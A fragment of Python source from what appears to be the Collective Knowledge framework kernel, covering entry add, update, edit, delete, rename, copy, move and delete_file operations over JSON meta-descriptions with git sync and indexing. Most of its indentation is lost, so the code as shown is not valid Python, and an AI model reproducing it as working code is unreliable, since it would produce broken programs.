cmupdates=i.get('updates',{})
if len(cmupdates)!=0:
updates=cmupdates
# r=merge_dicts({'dict1':updates, 'dict2':cmupdates})
# if r['return']>0: return r
# If name exists, add
info['backup_module_uoa']=muoa
info['backup_module_uid']=muid
info['backup_data_uid']=duid
if dn!='': info['data_name']=dn
# Add control info
ri=prepare_special_info_about_entry({})
if ri['return']>0: return ri
x=ri['dict']
# Check if pre-set control params such as author, copyright, license
ei=i.get('extra_info',{})
if len(ei)!=0: x.update(ei)
y=info.get('control',{})
if i.get('ignore_update','')!='yes':
if len(y)==0:
info['control']=x
else:
y=updates.get('control',[])
y.append(x)
updates['control']=y
sk=i.get('sort_keys','')
if sk=='': sk='yes'
if len(updates)>0:
# Record updates
rx=save_json_to_file({'json_file':p4u, 'dict':updates, 'sort_keys':sk})
if rx['return']>0: return rx
# Record meta description
rx=save_json_to_file({'json_file':p4, 'dict':a, 'sort_keys':sk})
if rx['return']>0: return rx
# Record info
rx=save_json_to_file({'json_file':p4i, 'dict':info, 'sort_keys':sk})
if rx['return']>0: return rx
# Record desc
rx=save_json_to_file({'json_file':p4d, 'dict':desc, 'sort_keys':sk})
if rx['return']>0: return rx
# Record extra files if there
ejf=i.get('extra_json_files',{})
if len(ejf)>0:
for ff in ejf:
dff=ejf[ff]
rz=save_json_to_file({'json_file':os.path.join(p2,ff), 'dict':dff, 'sort_keys':sk})
if rz['return']>0: return rz
if o=='con':
out('Entry '+d+' ('+duid+', '+p2+') '+t+' successfully!')
    # Check if the repo needs to be synced
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
os.chdir(pr)
if os.path.isdir(cfg['subdir_ck_ext']):
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', cfg['subdir_ck_ext'])
rx=os.system(ss)
os.chdir(p1)
if os.path.isdir(cfg['subdir_ck_ext']):
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', cfg['subdir_ck_ext'])
rx=os.system(ss)
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', pdd)
rx=os.system(ss)
os.chdir(ppp)
# Prepare output
rr={'return':0,
'dict': a,
'info': info,
'updates': updates,
'path':p2,
'path_module': pm,
'path_repo': pr,
'repo_uoa':ruoa,
'repo_uid':ruid,
'repo_alias':ralias,
'module_uoa':muoa,
'module_uid':muid,
'module_alias':malias,
'data_uoa':pdd,
'data_uid':duid,
'data_alias':dalias,
'data_name':dn}
# Check if need to add index
if i.get('skip_indexing','')!='yes' and cfg.get('use_indexing','')=='yes':
muid=rr['module_uid']
if index_module(muid,ruid):
duid=rr['data_uid']
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rr})
if ri['return']>0: return ri
# Remove lock after update if needed
if uuid!='':
pl=os.path.join(p2, cfg['subdir_ck_ext'], cfg['file_for_lock'])
if os.path.isfile(pl): os.remove(pl)
rr['return']=0
return rr
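# Example (illustrative comment-only sketch; all names are hypothetical):
# adding a new entry with some meta-description and tags via the 'access' API.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'add', 'module_uoa':'program', 'data_uoa':'demo',
#                  'dict':{'key':'value'}, 'tags':'example,demo'})
#   if r['return']>0: print(r['error'])
#   else: print('created at '+r['path'])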
##############################################################################
# Common action: update data (module) meta-description to a repository
#
# TARGET: CK kernel and low-level developers
def update(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(data_uid) - data UID (if uoa is an alias)
(data_name) - user friendly data name
(dict_from_cid) -
(dict_from_repo_uoa) -
(dict_from_module_uoa) -
(dict_from_data_uoa) - if present, pre-load dict
from this (module_uoa):data_uoa (analog of copy)
(dict) - meta description to record
(substitute) - if 'yes', substitute dictionaries, otherwise merge!
(tags) - list or comma separated list of tags to add to entry
(info) - entry info to record - normally, should not use it!
(updates) - entry updates info to record - normally, should not use it!
(ignore_update) - if 'yes', do not add info about update
(ask) - if 'yes', ask questions, otherwise silent
              (unlock_uid)           - unlock UID if it was previously locked
(sort_keys) - if 'yes', sort keys
(skip_indexing) - if 'yes', skip indexing even if it is globally on
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output from the 'add' function (the last one in case of wildcards)
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
# Try to load entry, if doesn't exist, add entry
dd={}
o=i.get('out','')
i['out']=''
# Check wildcards
lst=[]
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if duoa=='': duoa='*'
single_not_found=False # If no wild cards and entry not found, then add
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
else:
# Find path to data
r=find_path_to_data(i)
if r['return']>0:
single_not_found=True
else:
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
lst.append({'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid})
# Update entries
i['out']=o
r={'return':0}
if single_not_found:
r=add(i)
else:
i['update']='yes'
for q in lst:
ii={}
ii.update(i)
ii.update(q)
r=add(ii)
if r['return']>0: return r
return r
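# Example (illustrative comment-only sketch; names are hypothetical): updating
# an entry - by default the new 'dict' is merged into the stored meta, while
# 'substitute':'yes' replaces it entirely.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'update', 'module_uoa':'program', 'data_uoa':'demo',
#                  'dict':{'new_key':'new_value'}})
#   if r['return']>0: print(r['error'])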
##############################################################################
# Common action: edit data meta-description through external editor
#
# TARGET: CK kernel and low-level developers
def edit(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(ignore_update) - (default==yes) if 'yes', do not add info about update
(sort_keys) - (default==yes) if 'yes', sort keys
(edit_desc) - if 'yes', edit description rather than meta
(useful for compiler descriptions)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
iu=i.get('ignore_update','')
if iu=='': iu='yes'
ed=i.get('edit_desc','')
sk=i.get('sort_keys','')
if sk=='': sk='yes'
ii={'action':'load',
'repo_uoa':ruoa,
'module_uoa':muoa,
'data_uoa':duoa,
'common_func':'yes'}
r=access(ii)
if r['return']>0: return r
desc=r.get('desc',{})
meta=r['dict']
# Record to tmp file
import tempfile
fd, fn=tempfile.mkstemp(suffix='.tmp', prefix='ck-') # suffix is important - CK will delete such file!
os.close(fd)
os.remove(fn)
if ed=='yes': dd=desc
else: dd=meta
r=save_json_to_file({'json_file':fn, 'dict':dd, 'sort_keys':sk})
if r['return']>0: return r
# Get OS
r=get_os_ck({})
if r['return']>0: return r
plat=r['platform']
x=cfg['external_editor'][plat].replace('$#filename#$', fn)
os.system(x)
# Load file
r=load_json_file({'json_file':fn})
if r['return']>0: return r
if ed=='yes': desc=r['dict']
else: meta=r['dict']
# Update entry to finish sync/indexing
ii={'action':'update',
'repo_uoa':ruoa,
'module_uoa':muoa,
'data_uoa':duoa,
'common_func':'yes',
'ignore_update':iu,
'dict':meta,
'desc':desc,
'substitute':'yes',
'sort_keys':sk,
'out':o}
r=access(ii)
# Delete tmp file
if os.path.isfile(fn):
os.remove(fn)
return r
##############################################################################
# Common action: delete data (module) entry
#
# TARGET: CK kernel and low-level developers
def rm(i):
"""
Input: {
(repo_uoa) - repo UOA ; can be wild cards
module_uoa - module UOA ; can be wild cards
data_uoa - data UOA ; can be wild cards
(force) - if 'yes', force deleting without questions
or
(f) - to be compatible with rm -f
(share) - if 'yes', try to remove via GIT
(tags) - use these tags in format tags=x,y,z to prune rm
or
(search_string) - prune entries with expression *?
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
a=i.get('repo_uoa','')
# Check if global writing is allowed
r=check_writing({'repo_uoa':a, 'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
lst=[]
tags=i.get('tags','')
ss=i.get('search_string','')
# Check wildcards
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
if tags=='' and ss=='':
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
else:
r=search({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa, 'tags':tags, 'search_string':ss})
if r['return']>0: return r
lst=r['lst']
else:
# Find path to data
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
uu={'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid}
lst.append(uu)
force=i.get('force','')
if force=='':
force=i.get('f','')
first=True
for ll in lst:
p=ll['path']
pm=os.path.split(p)[0]
muid=ll['module_uid']
muoa=ll['module_uoa']
duid=ll['data_uid']
duoa=ll['data_uoa']
if duoa!=duid: dalias=duoa
else: dalias=''
# Get user-friendly CID
x=muoa+':'+duoa
if o=='con':
# Try to check if has data name (useful for env)
p2=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_info'])
if os.path.isfile(p2):
r2=load_json_file({'json_file':p2})
if r2['return']==0:
x2=r2['dict'].get('data_name','')
if x2!='' and x2!=None:
x='"'+x2+'"\n '+x
xcuoa=x+' ('+muid+':'+duid+')'
# Check repo/module writing
ii={'module_uoa':m, 'repo_uoa':ll['repo_uoa'], 'repo_uid':ll['repo_uid']}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
if split_dirs!=0:
pm=os.path.split(pm)[0]
shr=i.get('share','')
if shr=='yes':
rshared='git'
rsync='yes'
# If interactive
to_delete=True
if o=='con' and force!='yes':
r=inp({'text':'Are you sure to delete CK entry '+xcuoa+' ? (y/N): '})
c=r['string'].lower()
if c!='y' and c!='yes': to_delete=False
# If deleting
if to_delete:
# First remove alias if exists
if dalias!='':
# Delete alias
r=delete_alias({'path':pm, 'data_alias':dalias, 'data_uid':duid, 'repo_dict':rd, 'share':shr})
if r['return']>0: return r
if rshared!='':
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
ppp=os.getcwd()
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', pp1)
rx=os.system(ss)
# Delete directory
r={'return':0}
if os.path.isdir(p):
r=delete_directory({'path':p})
if rshared!='':
os.chdir(ppp)
if r['return']>0: return r
# Check if need to delete index
if cfg.get('use_indexing','')=='yes' and index_module(muid,ll['repo_uid']):
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
if o=='con':
out(' Entry '+xcuoa+' was successfully deleted!')
return {'return':0}
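# Example (illustrative comment-only sketch; names are hypothetical): deleting
# entries matched by wildcards and pruned by tags, without confirmation.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'rm', 'module_uoa':'program', 'data_uoa':'demo-*',
#                  'tags':'obsolete', 'force':'yes'})
#   if r['return']>0: print(r['error'])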
##############################################################################
# Common action: delete data (module) entry -> calls rm function
#
# TARGET: CK kernel and low-level developers
def remove(i):
"""
Input: { See rm function }
Output: { See rm function }
"""
return rm(i)
##############################################################################
# Common action: delete data (module) entry -> calls rm function
#
# TARGET: CK kernel and low-level developers
def delete(i):
"""
Input: { See rm function }
Output: { See rm function }
"""
return rm(i)
##############################################################################
# Common action: rename data entry
#
# TARGET: CK kernel and low-level developers
def ren(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - old data UOA
new_data_uoa - new data alias
or
new_data_uid - new data UID (leave empty to keep old one)
or
xcids[0] - {'data_uoa'} - new data UOA
(new_uid) - generate new UID
(remove_alias) - if 'yes', remove alias
(add_uid_to_alias) - if 'yes', add UID to alias
(share) - if 'yes', try to remove old entry via GIT and add new one
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='': return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': return {'return':1, 'error':'data UOA is not defined'}
# Attempt to load original entry meta
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
rdd=r
muid=r['module_uid']
pr=r['path_repo']
ddi=r['info']
duoa=r['data_uoa']
duid=r['data_uid']
dalias=r['data_alias']
change_data_name=(ddi.get('data_name','')==dalias)
p=r['path']
pm=r['path_module']
p1=os.path.join(pm, cfg['subdir_ck_ext'])
pn=p
# Check if writing is allowed
ruid=r['repo_uid']
ii={'module_uoa':muoa, 'module_uid':muid, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
shr=i.get('share','')
if shr=='yes':
rshared='git'
rsync='yes'
# Check if index -> delete old index
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
# Check new data UOA
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
if nduid=='' and i.get('new_uid','')=='yes':
rx=gen_uid({})
if rx['return']>0: return rx
nduid=rx['data_uid']
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if i.get('remove_alias','')=='yes':
nduoa=duid
if nduoa=='': nduoa=duoa
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, nduoa) or \
not re.match(anames, nduid):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
nduoa=nduoa.lower()
nduid=nduid.lower()
if nduid!=duid:
# Check that new UID doesn't exist
p2=os.path.join(p1, cfg['file_alias_u'] + nduid)
if os.path.isfile(p2):
return {'return':1, 'error':'new UID already exists'}
# Check if adding UID to alias
if i.get('add_uid_to_alias','')=='yes':
x=nduid
if x=='': x=duid
nduoa+='-'+x
if nduoa!=duoa:
if not is_uoa(nduoa):
return {'return':1, 'error':'alias has disallowed characters'}
# Need to rename directory
if os.path.isdir(nduoa):
return {'return':1, 'error': 'new alias already exists'}
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
if split_dirs!=0:
sd1,sd2=split_name(nduoa, split_dirs)
pm1=pm
if sd2!='': # otherwise name is smaller than the split number
pm1=os.path.join(pm, sd1)
if not os.path.isdir(pm1):
os.mkdir(pm1)
pn=os.path.join(pm1, nduoa)
else:
pn=os.path.join(pm, nduoa)
if rshared!='' and rsync=='yes':
import shutil
shutil.copytree(p,pn)
ppp=os.getcwd()
pp=os.path.split(pn)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
if os.path.isdir(p):
shutil.rmtree(p, onerror=rm_read_only)
else:
os.rename(p, pn)
if nduid!='' or change_data_name:
# Change backup_data_uid in info file
ppi=os.path.join(pn,cfg['subdir_ck_ext'],cfg['file_info'])
if nduid!='':
ddi['backup_data_uid']=nduid
if change_data_name:
ddi['data_name']=nduoa
rx=save_json_to_file({'json_file':ppi, 'dict':ddi, 'sort_keys':'yes'})
if rx['return']>0: return rx
if nduid=='': nduid=duid
# Remove old alias disambiguator
if not is_uid(duoa):
r=delete_alias({'path':pm, 'data_uid':duid, 'data_alias':duoa, 'share':shr})
if r['return']>0: return r
# Add new disambiguator, if needed
if not is_uid(nduoa):
if not os.path.isdir(p1):
# Create .cm directory
try:
os.mkdir(p1)
except Exception as e:
return {'return':1, 'error':format(e)}
# Write UOA disambiguator
p3=os.path.join(p1, cfg['file_alias_a'] + nduoa)
ru=save_text_file({'text_file':p3, 'string':nduid+'\n'})
if ru['return']>0: return ru
# Write UID disambiguator
p2=os.path.join(p1, cfg['file_alias_u'] + nduid)
ru=save_text_file({'text_file':p2, 'string':nduoa+'\n'})
if ru['return']>0: return ru
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
pp=os.path.split(p1)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
# Check if index and add new
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
# Need to reload to get new dictionary with updated aliases/UIDs
rdd=load({'repo_uoa':ruid,
'module_uoa':muid,
'data_uoa':nduid})
if rdd['return']>0: return rdd
if is_uid(nduoa): nduid=nduoa
path='/'+muid+'/'+nduid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rdd})
if ri['return']>0: return ri
if o=='con':
out('Entry was successfully renamed!')
return {'return':0}
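# Example (illustrative comment-only sketch; names are hypothetical): renaming
# an entry while keeping its UID.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'ren', 'module_uoa':'program',
#                  'data_uoa':'demo', 'new_data_uoa':'demo-renamed'})
#   if r['return']>0: print(r['error'])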
##############################################################################
# Common action: rename data entry -> calls 'ren' function
#
# TARGET: CK kernel and low-level developers
def rename(i):
"""
Input: { See ren function }
Output: { See ren function }
"""
return ren(i)
##############################################################################
# Common action: copy (or move) data entry
#
# TARGET: CK kernel and low-level developers
def cp(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
xcids[0] - {'repo_uoa', 'module_uoa', 'data_uoa'} - new CID
or
(new_repo_uoa) - new repo UOA
(new_module_uoa) - new module UOA
new_data_uoa - new data alias
(new_data_uid) - new data UID (leave empty to generate new one)
              (move)                  - if 'yes', remove the old entry after copying (i.e. move)
(keep_old_uid) - if 'yes', keep old UID
(without_files) - if 'yes', do not move/copy files
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'add' function
}
"""
move=i.get('move','')
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
import shutil
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='': return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': return {'return':1, 'error':'data UOA is not defined'}
# Attempt to load
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
rdd=r
muid=r['module_uid']
duoa=r['data_uoa']
duid=r['data_uid']
p=r['path']
dd=r.get('dict',{})
di=r.get('info',{})
du=r.get('updates',{})
dx=r.get('desc',{})
if move!='yes':
control=di.get('control',{})
control['version']=cfg['version']
rdt=get_current_date_time({})
control['iso_datetime']=rdt['iso_datetime']
di['control']=control
# Check if writing is allowed
ruid=r['repo_uid']
ii={'module_uoa':muoa, 'module_uid':r['module_uid'], 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
# Check new CID
nruoa=i.get('new_repo_uoa','')
nmuoa=i.get('new_module_uoa','')
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if nduoa=='': nduoa=duoa
x=xcid.get('module_uoa','')
if x!='': nmuoa=x
x=xcid.get('repo_uoa','')
if x!='': nruoa=x
if i.get('keep_old_uid','')=='yes': nduid=duid
if nmuoa=='': nmuoa=muoa
if nruoa=='': nruoa=ruoa
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, nduoa) or \
not re.match(anames, nduid):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
nduoa=nduoa.lower()
nduid=nduid.lower()
nmuoa=nmuoa.lower()
nruoa=nruoa.lower()
# Adding new entry
if nruoa==ruoa and nmuoa==muoa and nduid==duid:
return {'return':1, 'error':'moving within the same directory - use "rename" instead'}
# Check if writing is allowed to the new repo
ii={'repo_uoa':nruoa}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
ii={'module_uoa':nmuoa, 'data_uoa': nduoa, 'dict':dd, 'info':di,
'updates':du, 'desc':dx, 'ignore_update':'yes'}
if nduid!='': ii['data_uid']=nduid
if nruoa!='': ii['repo_uoa']=nruoa
r=add(ii)
if r['return']>0: return r
pn=r['path']
nmuid=r['module_uid']
    # Recursively copy all files (except .cm)
if i.get('without_files','')!='yes':
rx=list_all_files({'path':p, 'all':'yes'})
if rx['return']>0: return rx
for q in rx['list']:
if q.startswith('.cm'): continue
p1=os.path.join(p,q)
pn1=os.path.join(pn,q)
# Create if dir
pn1d=os.path.dirname(pn1)
if not os.path.isdir(pn1d): os.makedirs(pn1d)
shutil.copy(p1,pn1)
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
pp=os.path.split(pn)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
tt='copied'
# If move, remove old one
if move=='yes':
tt='moved'
ii={'module_uoa':muoa, 'data_uoa': duoa}
if ruoa!='': ii['repo_uoa']=ruoa
rx=rm(ii)
if rx['return']>0: return rx
# Check if index and add new
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
if is_uid(nduoa): nduid=nduoa
path='/'+nmuid+'/'+nduid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
if cfg.get('use_indexing','')=='yes' and index_module(muid,nruoa):
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rdd})
if ri['return']>0: return ri
if o=='con':
out('Entry '+muoa+':'+duoa+' was successfully '+tt+'!')
return r
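# Example (illustrative comment-only sketch; names are hypothetical): copying
# an entry into another repo under a new alias; add 'move':'yes' to move it.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'cp', 'module_uoa':'program', 'data_uoa':'demo',
#                  'new_repo_uoa':'my-repo', 'new_data_uoa':'demo-copy'})
#   if r['return']>0: print(r['error'])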
##############################################################################
# Common action: copy (or move) data entry
#
# TARGET: CK kernel and low-level developers
def copy(i):
"""
Input: { See 'cp' function }
Output: { See 'cp' function }
"""
return cp(i)
##############################################################################
# Common action: move data entry
#
# TARGET: CK kernel and low-level developers
def mv(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
xcids[0] - {'repo_uoa', 'module_uoa', 'data_uoa'} - new CID
or
(new_repo_uoa) - new repo UOA
(new_module_uoa) - new module UOA
(new_data_uoa) - new data alias
(new_data_uid) - new data UID (leave empty to generate new one)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'copy' function
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
# Check if wild cards
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if (duoa.find('*')>=0 or duoa.find('?')>=0) and nduoa=='' and nduid=='':
r=list_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
else:
lst=[{'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa}]
i['move']='yes'
i['keep_old_uid']='yes'
r={'return':0}
for ll in lst:
i['repo_uoa']=ll['repo_uoa']
i['module_uoa']=ll['module_uoa']
i['data_uoa']=ll['data_uoa']
r=copy(i)
if r['return']>0: return r
return r
##############################################################################
# Common action: move data entry
#
# TARGET: CK kernel and low-level developers
def move(i):
"""
Input: { See 'mv' function }
Output: { See 'mv' function }
"""
return mv(i)
##############################################################################
# Common action: delete file from an entry
#
# TARGET: CK kernel and low-level developers
def delete_file(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
filename - filename to delete including relative path
(force) - if 'yes', force deleting without questions
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
if fn=='':
return {'return':1, 'error':'filename is not defined'}
# Get info about entry
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
ruoa=r['repo_uoa']
ruid=r['repo_uid']
# Check repo/module writing
ii={'module_uoa':muoa, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
p1=os.path.normpath(os.path.join(p, fn))
px=os.path.normpath(os.path.join(p, cfg['subdir_ck_ext']))
if p1.startswith(px):
return {'return':1, 'error':'path points to the special directory with meta info'}
if not p1.startswith(p):
return {'return':1, 'error':'path is outside entry'}
if not os.path.isfile(p1) and not os.path.isdir(p1):
return {'return':1, 'error':'file or directory is not found'}
p2=os.path.split(p1)
px0=p2[0]
px1=p2[1]
if rshared!='':
ppp=os.getcwd()
os.chdir(px0)
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', px1)
rx=os.system(ss)
if os.path.isfile(p1):
os.remove(p1)
if os.path.isdir(p1):
import shutil
shutil.rmtree(p1, onerror=rm_read_only)
if rshared!='':
os.chdir(ppp)
return {'return':0}
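# Example (illustrative comment-only sketch; names are hypothetical): removing
# a single file from an entry without touching its meta-description.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'delete_file', 'module_uoa':'program',
#                  'data_uoa':'demo', 'filename':'old-results.txt', 'force':'yes'})
#   if r['return']>0: print(r['error'])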
##############################################################################
# Common action: list data entries
#
# TARGET: CK kernel and low-level developers
def list_data(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
(repo_uoa_list) - list of repos to search
              (module_uoa_list)       - list of modules to search
              (data_uoa_list)         - list of data entries to search
(filter_func) - name of filter function
(filter_func_addr) - address of filter function
(add_if_date_before) - add only entries with date before this date
(add_if_date_after) - add only entries with date after this date
(add_if_date) - add only entries with this date
(ignore_update) - if 'yes', do not add info about update (when updating in filter)
(search_by_name) - search by name
(search_dict) - search if this dict is a part of the entry
(ignore_case) - ignore case when searching!
(print_time) - if 'yes', print elapsed time at the end
(do_not_add_to_lst) - if 'yes', do not add entries to lst
(time_out) - in secs, default=30 (if -1, no timeout)
(limit_size) - if !='' limit size
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
or
(all)
(print_uid) - if 'yes', print UID in brackets
(print_name) - if 'yes', print name (and add info to the list)
or
(name)
(add_info) - if 'yes', add info about entry to the list
(add_meta) - if 'yes', add meta about entry to the list
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path' (,info)
}]
elapsed_time - elapsed time in string
(timed_out) - if 'yes', timed out or limited by size
}
"""
import time
start_time = time.time()
xls=i.get('limit_size','')
if xls=='': xls='0'
ls=int(xls)
ils=0
lst=[]
o=i.get('out','')
debug=(cfg.get('debug','').lower()=='yes' or cfg.get('debug','').lower()=='1')
iu=i.get('ignore_update', '')
prf=i.get('print_full','')
if prf=='': prf=i.get('all','')
iprf=(prf=='yes')
prn=i.get('print_name','')
if prn=='': prn=i.get('name','')
iprn=(prn=='yes')
ipru=(i.get('print_uid','')=='yes')
# Add info about entry to the final list
# (particularly when searching by special keywords,
# such as name or date of creation
iaf=(i.get('add_info','')=='yes')
iam=(i.get('add_meta','')=='yes')
aidb=i.get('add_if_date_before','')
